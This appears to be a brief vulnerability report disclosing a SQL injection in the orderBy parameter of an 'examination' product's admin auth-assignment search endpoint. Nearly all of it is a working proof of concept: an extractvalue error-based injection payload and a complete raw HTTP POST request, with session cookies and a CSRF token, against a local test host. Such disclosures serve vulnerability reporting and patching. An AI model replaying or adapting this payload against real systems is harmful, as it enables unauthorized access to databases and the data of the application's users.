admin/admin/auth-assignment/search has sql injection vulnerability

[qbz95aaa]

Vulnerability Product:examination Vulnerability type:sql injection Vulnerability Details：admin/admin/auth-assignment/search

poc params%5BorderBy%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281446970635%29%29%29

POST /admin/admin/auth-assignment/search HTTP/1.1
Host: 192.168.3.129:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 555
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: ace_settings=%7B%22sidebar-collapsed%22%3A-1%7D; Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1678157952; Hm_lpvt_d3b3b1b968a56124689d1366adeacf8f=1678169014; PHPSESSID=s0dfimdr2smjmr3074qpav8po2; _admin=90cb44057f6077d07dc09f747754e4ea1023f1d289f128c441138467bbf77bb3a%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22_admin%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22tGaaJtNH3SXtUEJtA6LIgNb0LQPEjste%22%2C2592000%5D%22%3B%7D; _csrf=d2ae05f533b7d5d759466c965771950e3a44d9703c618e14b02f805ca2430034a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%222YAZrBa_nRKs7CoKBIVaKhRQvAAV1_Up%22%3B%7D
Origin: http://192.168.3.129:8092
Referer: http://192.168.3.129:8092/admin/admin/auth-assignment/index
X-Csrf-Token: 0nNavAQMO5OSOv5UKzFPV5ZBGRiQEzi45ig6yqwsnlPgKhvmdk5azPxotSccciAc1AhPedt7aumQaXucnXPLIw==
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_2=false&bRegex_3=false&bSearchable_0=true&bSearchable_1=true&bSearchable_2=true&bSearchable_3=true&bSortable_0=false&bSortable_1=false&bSortable_2=true&bSortable_3=false&iColumns=4&iDisplayLength=10&iDisplayStart=0&iSortingCols=0&mDataProp_0=user_id&mDataProp_1=item_name&mDataProp_2=created_at&mDataProp_3=&params%5BorderBy%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281446970635%29%29%29&params%5Buser_id%5D%5B%5D=1&sColumns=%2C%2C%2C&sEcho=2&sSearch=&sSearch_0=&sSearch_1=&sSearch_2=&sSearch_3=